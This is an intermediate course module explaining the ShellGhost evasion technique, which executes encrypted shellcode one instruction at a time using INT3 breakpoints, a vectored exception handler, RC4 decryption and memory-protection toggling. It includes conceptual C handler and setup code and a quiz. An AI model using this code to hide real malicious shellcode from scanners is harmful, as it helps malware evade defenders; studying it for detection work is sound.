Difficulty: Intermediate

Module 4: The ShellGhost Concept

The complete single-instruction execution model — how INT3, VEH, shellcode mapping, SystemFunction032, and RW/RX toggling combine into invisible shellcode.

Module Objective

This module ties together the foundational concepts (INT3 breakpoints, VEH handlers, CONTEXT usage, and per-instruction encryption) into the complete ShellGhost execution model. You will understand the full cycle: how each shellcode instruction is replaced with 0xCC, how a Python preprocessing script maps each instruction for independent encryption, and how the VEH handler re-encrypts the previous instruction and decrypts the current one on each breakpoint — all within a single EXCEPTION_BREAKPOINT handler. This is the conceptual core of lem0nSec's ShellGhost technique.

1. The One-Exception Cycle

ShellGhost's execution revolves around a one-exception cycle that repeats for every instruction in the shellcode. Each iteration involves exactly one exception (EXCEPTION_BREAKPOINT) and one VEH handler invocation that performs both re-encryption of the previous instruction and decryption of the current one:

The ShellGhost One-Exception Cycle

  1. CPU hits 0xCC: EXCEPTION_BREAKPOINT
  2. VEH: re-encrypt previous: restore 0xCC
  3. VEH: decrypt current: SystemFunction032
  4. Toggle RW→RX: VirtualProtect
  5. Execute instruction: CPU runs decrypted code
  6. Next 0xCC hit: cycle repeats
Step | Handler Action | Result
Step 1 | EXCEPTION_BREAKPOINT fires. Handler re-encrypts the previously executed instruction bytes back to 0xCC (if any). | Previous instruction is cleaned up
Step 2 | Handler looks up the current instruction in the CRYPT_BYTES_QUOTA array, decrypts it using SystemFunction032 (RC4), and writes the decrypted bytes to the execution buffer. | Current instruction is ready for execution
Step 3 | Handler toggles the page from RW to RX via VirtualProtect and returns EXCEPTION_CONTINUE_EXECUTION. | CPU resumes and executes the decrypted instruction, then hits the next 0xCC

2. Memory State at Each Phase

To make this concrete, let us trace the memory state through two iterations of the cycle. Assume the shellcode starts at address 0x1000. The first instruction is 0x48 0x89 0xE5 (mov rbp, rsp; 3 bytes) and the second is 0x48 0x83 0xEC 0x20 (sub rsp, 0x20; 4 bytes):

Step-by-Step Memory Trace

Step | Memory at 0x1000-0x1002 | Memory at 0x1003-0x1006 | RIP | Event
Initial | CC CC CC | CC CC CC CC | 0x1000 | CPU encounters 0xCC, BREAKPOINT fires
After 1st BP handler | 48 89 E5 | CC CC CC CC | 0x1000 | Handler decrypts instruction 1, toggles to RX
After instruction 1 executes | 48 89 E5 | CC CC CC CC | 0x1003 | CPU executes mov rbp,rsp; hits next 0xCC, BREAKPOINT fires
After 2nd BP handler | CC CC CC | 48 83 EC 20 | 0x1003 | Handler re-encrypts instr 1, decrypts instr 2, toggles to RX
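The trace above can be replayed on an ordinary byte array. The following is a minimal sketch that only models buffer contents: nothing is executed, no encryption is involved, and the names (InsnSpan, sim_init, sim_step) are hypothetical and not taken from ShellGhost.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical type: one instruction's offset and length in the buffer. */
typedef struct {
    uint32_t rva;    /* offset of the instruction within the buffer */
    uint32_t quota;  /* length of the instruction in bytes */
} InsnSpan;

/* "Initial" row of the trace: every byte is 0xCC. */
void sim_init(uint8_t *buf, size_t len) {
    memset(buf, 0xCC, len);
}

/* Models one breakpoint-handler pass on plain data:
 * restore the previous span to 0xCC (if prev is non-NULL),
 * then copy the current instruction's plaintext bytes into place. */
void sim_step(uint8_t *buf, size_t len, const uint8_t *plain,
              const InsnSpan *prev, const InsnSpan *cur) {
    assert(cur->rva + (size_t)cur->quota <= len);
    if (prev != NULL) {
        assert(prev->rva + (size_t)prev->quota <= len);
        memset(buf + prev->rva, 0xCC, prev->quota);
    }
    memcpy(buf + cur->rva, plain + cur->rva, cur->quota);
}
```

Calling sim_init and then sim_step twice with spans {0, 3} and {3, 4} over the seven bytes 48 89 E5 48 83 EC 20 reproduces the four rows of the table in order.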

Important Nuance: Multi-Byte Instructions

x86/x64 instructions can be 1 to 15 bytes long. ShellGhost handles this through the shellcode mapping preprocessing step. The Python script (ShellGhost_mapping.py) disassembles the shellcode ahead of time and records each instruction's offset (RVA) and byte count (quota) in a CRYPT_BYTES_QUOTA struct. At runtime, the VEH handler uses this mapping to know exactly how many bytes to decrypt for the current instruction and how many bytes to re-encrypt from the previous one. There is no need to determine instruction boundaries at runtime.
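Because the handler trusts the precomputed map completely, a sanity check on the map is a natural companion to the preprocessing step. The sketch below is an assumption about what such a check could look like, not part of ShellGhost: MapEntry mirrors the rva/quota pair described above using portable integer types, and map_is_consistent is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical portable mirror of the rva/quota pair. */
typedef struct {
    uint32_t rva;    /* offset of the instruction */
    uint32_t quota;  /* instruction length in bytes */
} MapEntry;

/* Returns 1 when the entries are contiguous from offset 0, each length
 * is a legal x86/x64 instruction length (1 to 15 bytes), and together
 * they cover exactly `total` bytes. Returns 0 otherwise. */
int map_is_consistent(const MapEntry *map, size_t count, size_t total) {
    assert(map != NULL || count == 0);
    size_t expected = 0;
    for (size_t i = 0; i < count; i++) {
        if (map[i].rva != expected) {
            return 0;  /* gap or overlap between instructions */
        }
        if (map[i].quota < 1 || map[i].quota > 15) {
            return 0;  /* not a valid instruction length */
        }
        expected += map[i].quota;
    }
    return expected == total;
}
```

For the three-instruction example used in this module (lengths 3, 4, and 2), the map is consistent only for a total of 9 bytes; any gap, overlap, or size mismatch makes the check fail.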

3. The Handler Logic

ShellGhost's VEH handler performs all work within a single EXCEPTION_BREAKPOINT handler. Each invocation does both re-encryption and decryption:

// Conceptual handler logic
LONG CALLBACK GhostHandler(PEXCEPTION_POINTERS ep) {
    DWORD code = ep->ExceptionRecord->ExceptionCode;
    PCONTEXT ctx = ep->ContextRecord;

    if (code == EXCEPTION_BREAKPOINT) {
        // Rip already points to the 0xCC (kernel adjusted it)
        PBYTE current = (PBYTE)ctx->Rip;

        // Validate: is this in our execution buffer?
        if (!IsInExecBuffer(current))
            return EXCEPTION_CONTINUE_SEARCH;

        // Step 1: Re-encrypt the PREVIOUS instruction (if any)
        //   - Toggle to RW via VirtualProtect
        //   - Write 0xCC back over previous instruction bytes
        // (g_ghost is the global GHOST_CONTEXT defined in section 4)
        if (g_ghost.prev_index >= 0) {
            ReEncryptPrevious();
        }

        // Step 2: Decrypt the CURRENT instruction
        //   - Look up CRYPT_BYTES_QUOTA for current instruction index
        //   - Use SystemFunction032 to decrypt instruction bytes
        //   - Write decrypted bytes to execution buffer
        DecryptCurrent(g_ghost.current_index);

        // Step 3: Toggle memory to RX for execution
        DWORD old;
        VirtualProtect(g_ghost.exec_buffer, g_ghost.exec_size,
            PAGE_EXECUTE_READ, &old);

        // Step 4: Advance instruction index
        g_ghost.prev_index = (INT)g_ghost.current_index;
        g_ghost.current_index++;

        return EXCEPTION_CONTINUE_EXECUTION;
    }

    // Not our exception
    return EXCEPTION_CONTINUE_SEARCH;
}

4. The Data Structures

ShellGhost needs to maintain several pieces of state across handler invocations. These are typically stored in global variables accessible to the VEH handler:

// Key data structure: per-instruction encryption mapping
// Generated by ShellGhost_mapping.py preprocessing script
typedef struct _CRYPT_BYTES_QUOTA {
    DWORD rva;      // Offset of this instruction within the shellcode
    DWORD quota;    // Number of bytes in this instruction
} CRYPT_BYTES_QUOTA;

// Example: first 3 instructions mapped by the preprocessing script
// CRYPT_BYTES_QUOTA map[] = {
//     { 0x0000, 3 },  // mov rbp, rsp      (3 bytes at offset 0)
//     { 0x0003, 4 },  // sub rsp, 0x20     (4 bytes at offset 3)
//     { 0x0007, 2 },  // xor ecx, ecx      (2 bytes at offset 7)
//     ...
// };

// Global state for the ShellGhost handler
typedef struct _GHOST_CONTEXT {
    LPVOID  exec_buffer;       // Base address of the 0xCC-filled RW region
    SIZE_T  exec_size;         // Size of the execution buffer
    PBYTE   encrypted_sc;      // Per-instruction encrypted shellcode bytes
    SIZE_T  sc_size;           // Size of the shellcode

    // Instruction mapping (from preprocessing)
    CRYPT_BYTES_QUOTA *map;    // Array of per-instruction RVA + byte count
    DWORD   num_instructions;  // Total number of mapped instructions
    DWORD   current_index;     // Index of current instruction being executed

    // RC4 key for SystemFunction032
    BYTE    rc4_key[16];       // RC4 encryption key
    SIZE_T  key_len;           // Key length

    // Tracking state
    INT     prev_index;        // Index of previously executed instruction (-1 if none)
} GHOST_CONTEXT;

static GHOST_CONTEXT g_ghost = { 0 };

Why Global State?

VEH handlers receive only the EXCEPTION_POINTERS parameter — there is no way to pass custom context. Therefore, ShellGhost stores its state in global (or static) variables. This is safe because the execution buffer is only used by a single thread. If multi-threaded execution were needed, the state would need thread-local storage or synchronization.

5. Setup and Initialization

Before the execution cycle begins, ShellGhost performs these initialization steps:

// Note: In real ShellGhost, the preprocessing is done OFFLINE
// by ShellGhost_mapping.py. The encrypted data and CRYPT_BYTES_QUOTA
// arrays are compiled directly into the C source as static arrays.

void ShellGhostInit(
    PBYTE encrypted_sc,            // Pre-encrypted shellcode (from mapping.py)
    SIZE_T sc_size,
    CRYPT_BYTES_QUOTA *map,        // Instruction map (from mapping.py)
    DWORD num_instructions,
    PBYTE key, SIZE_T key_size
) {
    // Step 1: Store encrypted data and mapping references
    g_ghost.encrypted_sc = encrypted_sc;
    g_ghost.sc_size = sc_size;
    g_ghost.map = map;
    g_ghost.num_instructions = num_instructions;
    memcpy(g_ghost.rc4_key, key, key_size);
    g_ghost.key_len = key_size;
    g_ghost.prev_index = -1;
    g_ghost.current_index = 0;

    // Step 2: Allocate execution buffer filled with 0xCC (RW, not RWX)
    g_ghost.exec_buffer = VirtualAlloc(NULL, sc_size,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memset(g_ghost.exec_buffer, 0xCC, sc_size);
    g_ghost.exec_size = sc_size;

    // Step 3: Register VEH handler
    AddVectoredExceptionHandler(1, GhostHandler);

    // Step 4: Create thread at end of .text segment
    // ResolveEndofTextSegment() finds null bytes to use as entry
    LPVOID entry = ResolveEndofTextSegment();
    HANDLE hThread = CreateThread(NULL, 0,
        (LPTHREAD_START_ROUTINE)entry, NULL, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);
}

6. Address Validation

A critical part of the handler is verifying that the exception originated from within the execution buffer. Without this check, the handler would incorrectly process breakpoints from other sources (debugger breakpoints, other code using INT3, etc.):

// Check if the address is within our execution buffer
BOOL IsInExecBuffer(PVOID addr) {
    return (addr >= g_ghost.exec_buffer) &&
           (addr < (PBYTE)g_ghost.exec_buffer + g_ghost.exec_size);
}

LONG CALLBACK GhostHandler(PEXCEPTION_POINTERS ep) {
    PCONTEXT ctx = ep->ContextRecord;

    if (ep->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT) {
        // For breakpoint: the kernel (KiDispatchException) already
        // decremented RIP by 1, so ContextRecord->Rip points directly
        // at the 0xCC byte. No manual adjustment needed.
        PVOID cc_addr = (PVOID)ctx->Rip;

        if (!IsInExecBuffer(cc_addr)) {
            return EXCEPTION_CONTINUE_SEARCH;  // Not ours
        }
        // ... handle our breakpoint
    }
    // ...
}
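The bounds test is a half-open interval check, and its edge cases are easy to get wrong by one byte. Below is a portable sketch of the same idea using integer addresses; in_range and in_range_selfcheck are hypothetical names, and the subtraction form is a design choice made here so that base + size cannot wrap around.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Half-open interval test: base <= addr < base + size.
 * Written as (addr - base) < size so base + size is never computed
 * and therefore cannot overflow. */
int in_range(uintptr_t addr, uintptr_t base, size_t size) {
    return addr >= base && (addr - base) < size;
}

/* Edge cases for a 7-byte buffer at 0x1000, as in the memory trace. */
void in_range_selfcheck(void) {
    assert(in_range(0x1000, 0x1000, 7));   /* first byte is inside */
    assert(in_range(0x1006, 0x1000, 7));   /* last byte is inside */
    assert(!in_range(0x1007, 0x1000, 7));  /* one past the end is outside */
    assert(!in_range(0x0FFF, 0x1000, 7));  /* one before the start is outside */
}
```

The address one past the end is deliberately outside the range: a breakpoint there belongs to whatever follows the buffer, so the handler should return EXCEPTION_CONTINUE_SEARCH for it.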

7. The Complete Conceptual Flow

Here is the entire ShellGhost execution flow from start to finish:

Preprocessing Phase (Offline)

  1. ShellGhost_mapping.py disassembles the raw shellcode using a disassembler (e.g., Capstone)
  2. Each instruction's offset (RVA) and byte count (quota) are recorded into CRYPT_BYTES_QUOTA structs
  3. Each instruction is encrypted independently with RC4, the same cipher that SystemFunction032 applies at runtime to decrypt it
  4. The encrypted data and mapping arrays are output as C source code to be compiled into the binary

Initialization Phase (Runtime)

  1. Load the pre-encrypted shellcode data and instruction map (compiled into the binary)
  2. Allocate a PAGE_READWRITE region and fill it entirely with 0xCC
  3. Register the VEH handler with First = 1
  4. Create a new thread via CreateThread() with entry at the end of the .text segment

Execution Cycle (repeats per instruction)

  1. CPU hits 0xCC at current position → EXCEPTION_BREAKPOINT fires
  2. VEH handler: ContextRecord->Rip already points at the 0xCC (kernel adjusted it)
  3. VEH handler: toggle page to RW via VirtualProtect
  4. VEH handler: re-encrypt the previously executed instruction back to 0xCC (if any)
  5. VEH handler: look up CRYPT_BYTES_QUOTA for current instruction index to get RVA and byte count
  6. VEH handler: call SystemFunction032 to decrypt the instruction bytes at that offset
  7. VEH handler: write the decrypted bytes to the execution buffer
  8. VEH handler: toggle page to RX via VirtualProtect and return EXCEPTION_CONTINUE_EXECUTION
  9. CPU executes the decrypted instruction, then encounters the next 0xCC → cycle repeats from step 1

Termination

When the shellcode executes a ret instruction or otherwise transfers control outside the execution buffer, the next exception (if any) will not pass the address validation check, and normal execution resumes. If the shellcode calls Windows APIs, those calls execute normally without triggering breakpoints (the APIs live outside the execution buffer).

8. What a Memory Scanner Sees

At any point during execution, a memory scanner examining the execution buffer sees:

Execution buffer during ShellGhost operation:

Address     Content    Meaning
0x1000      CC         INT3 (already executed and re-encrypted)
0x1001      CC         INT3 (already executed and re-encrypted)
0x1002      CC         INT3 (already executed and re-encrypted)
0x1003      48         Decrypted instruction (currently executing)
0x1004      83         (part of current instruction)
0x1005      EC         (part of current instruction)
0x1006      20         (part of current instruction)
0x1007      CC         INT3 (not yet reached)
...         CC         INT3 (all remaining bytes)

At MOST one instruction is decrypted (~1-15 bytes).
Every other byte is 0xCC.
No shellcode signature. No recognizable payload pattern. No high-entropy region.
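From a defender's point of view, the listing above is itself a measurable property: the region is almost entirely 0xCC, with at most one short run of other bytes. The following sketch shows one way a scanner might quantify that. The names (CcStats, cc_stats, looks_like_int3_sea) and the thresholds (a 64-byte minimum, 90% 0xCC, runs of at most 15 bytes) are assumptions chosen for illustration, not values from any real product.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical summary of how much of a region is INT3 filler. */
typedef struct {
    size_t cc_count;        /* number of 0xCC bytes */
    size_t longest_non_cc;  /* longest run of bytes other than 0xCC */
} CcStats;

/* Single pass over the region, counting 0xCC bytes and tracking the
 * longest consecutive run of non-0xCC bytes. */
CcStats cc_stats(const uint8_t *buf, size_t len) {
    CcStats s = {0, 0};
    size_t run = 0;
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0xCC) {
            s.cc_count++;
            run = 0;
        } else {
            run++;
            if (run > s.longest_non_cc) {
                s.longest_non_cc = run;
            }
        }
    }
    return s;
}

/* Assumed heuristic: flag regions of at least 64 bytes where 90% or
 * more of the bytes are 0xCC and no other run exceeds 15 bytes
 * (the maximum x86/x64 instruction length). */
int looks_like_int3_sea(const uint8_t *buf, size_t len) {
    assert(buf != NULL);
    if (len < 64) {
        return 0;
    }
    CcStats s = cc_stats(buf, len);
    return s.cc_count * 10 >= len * 9 && s.longest_non_cc <= 15;
}
```

A heuristic like this would need tuning before real use, since compilers also emit 0xCC as padding between functions, so short runs of INT3 inside ordinary code are expected and benign.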

The "Ghost" Effect

This is why the tool is called ShellGhost. The shellcode is like a ghost: it is there, executing and producing effects, but it is never present in memory as a whole. A scan or dump of the execution buffer shows 0xCC filler and at most one decrypted instruction, not a recognizable payload. The shellcode materializes one instruction at a time, executes, and vanishes back into a sea of 0xCC bytes.

Knowledge Check

Q1: How many exceptions does ShellGhost generate per shellcode instruction?

A) One (EXCEPTION_BREAKPOINT only)
B) Two (EXCEPTION_BREAKPOINT then EXCEPTION_SINGLE_STEP)
C) Three (breakpoint, single-step, and access violation)
D) It varies depending on instruction length

Q2: Why must the VEH handler check if the exception address is within the execution buffer?

A) To prevent stack overflow from recursive exceptions
B) To handle multi-threaded shellcode execution
C) To avoid processing breakpoints from other sources (debuggers, other code)
D) To ensure the buffer has not been freed

Q3: What does the execution buffer contain when a memory scanner reads it during ShellGhost execution?

A) Almost entirely 0xCC bytes, with at most one decrypted instruction
B) The fully decrypted shellcode
C) RC4-encrypted ciphertext
D) Random data with high entropy